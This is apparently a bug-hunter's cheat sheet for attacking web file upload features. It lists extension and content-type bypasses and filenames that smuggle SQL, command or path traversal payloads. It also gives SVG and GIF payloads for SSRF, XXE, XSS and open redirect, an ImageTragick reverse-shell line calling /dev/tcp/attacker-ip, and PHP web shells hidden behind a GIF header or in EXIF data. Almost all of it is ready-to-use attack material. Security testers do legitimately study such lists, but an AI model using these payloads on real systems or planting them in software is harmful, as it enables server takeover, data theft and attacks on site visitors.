Upload Function
- Upload Function
-
Extensions Impact
ASP
,ASPX
,PHP5
,PHP
,PHP3
: Webshell, RCESVG
: Stored XSS, SSRF, XXEGIF
: Stored XSS, SSRFCSV
: CSV injectionXML
: XXEAVI
: LFI, SSRFHTML
,JS
: HTML injection, XSS, Open redirectPNG
,JPEG
: Pixel flood attack (DoS)ZIP
: RCE via LFI, DoSPDF
,PPTX
: SSRF, BLIND XXE
-
Blacklisting Bypass
- PHP →
.phtm
,phtml
,.phps
,.pht
,.php2
,.php3
,.php4
,.php5
,.shtml
,.phar
,.pgif
,.inc
- ASP →
asp
,.aspx
,.cer
,.asa
- Jsp →
.jsp
,.jspx
,.jsw
,.jsv
,.jspf
- Coldfusion →
.cfm
,.cfml
,.cfc
,.dbm
- Using random capitalization →
.pHp
,.pHP5
,.PhAr
- PHP →
-
Whitelisting Bypass
file.jpg.php
file.php.jpg
file.php.blah123jpg
file.php%00.jpg
file.php\x00.jpg
this can be done while uploading the file too, name itfile.phpD.jpg
and change the D (44) in hex to 00.file.php%00
file.php%20
file.php%0d%0a.jpg
file.php.....
file.php/
file.php.\
file.php#.png
(Worked on apple.com)file.
.html
-
Vulnerabilities
-
Directory Traversal
- Set filename
../../etc/passwd/logo.png
- Set filename
../../../logo.png
as it might changed the website logo.
- Set filename
-
SQL Injection
- Set filename
'sleep(10).jpg
. - Set filename
sleep(10)-- -.jpg
.
- Set filename
-
Command Injection
- Set filename
; sleep 10;
- Set filename
-
SSRF
- Abusing the “Upload from URL”, if this image is going to be saved in some public site, you could also indicate a URL from IPlogger and steal information of every visitor.
- SSRF Through
.svg
file.
<?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="200" width="200" xlink:href="https://attacker.com/picture.jpg" /></svg>
-
ImageTragic
push graphic-context viewbox 0 0 640 480 fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)' pop graphic-context
-
XXE
- Upload using
.svg
file
<?xml version="1.0" standalone="yes"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]> <svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <text font-size="40" x="0" y="16">&xxe;</text> </svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"> <image xlink:href="expect://ls"></image> </svg>
- Using excel file
- Upload using
-
XSS
- Set file name
filename="svg onload=alert(document.domain)>"
,filename="58832_300x300.jpg<svg onload=confirm()>"
- Upload using
.gif
file
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
- Upload using
.svg
file
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("HolyBugx XSS"); </script> </svg>
- Set file name
-
Open Redirect
- Upload using
.svg
file
<code> <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <svg onload="window.location='https://attacker.com'" xmlns="http://www.w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> </svg> </code>
- Upload using
-
-
Content-ish Bypass
-
Content-type validation
- Upload
file.php
and change theContent-type: application/x-php
orContent-Type : application/octet-stream
toContent-type: image/png
orContent-type: image/gif
orContent-type: image/jpg
.
- Upload
-
Content-Length validation
- Small PHP Shell
(<?=`$_GET[x]`?>)
-
Content Bypass Shell
- If they check the Content. Add the text “GIF89a;” before you shell-code. (
Content-type: image/gif
)
GIF89a; <?php system($_GET['cmd']); ?>
- If they check the Content. Add the text “GIF89a;” before you shell-code. (
-
-
Misc
-
Uploading
file.js
&file.config
(web.config) -
Pixel flood attack using image
-
DoS with a large values name:
1234...99.png
-
Zip Slip
- If a site accepts
.zip
file, upload.php
and compress it into.zip
and upload it. Now visit,site.com/path?page=zip://path/file.zip%23rce.php
- If a site accepts
-
Image Shell
- Exiftool is a great tool to view and manipulate exif-data. Then I will to rename the file
mv pic.jpg pic.php.jpg
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' pic.jpg
- Exiftool is a great tool to view and manipulate exif-data. Then I will to rename the file
-
-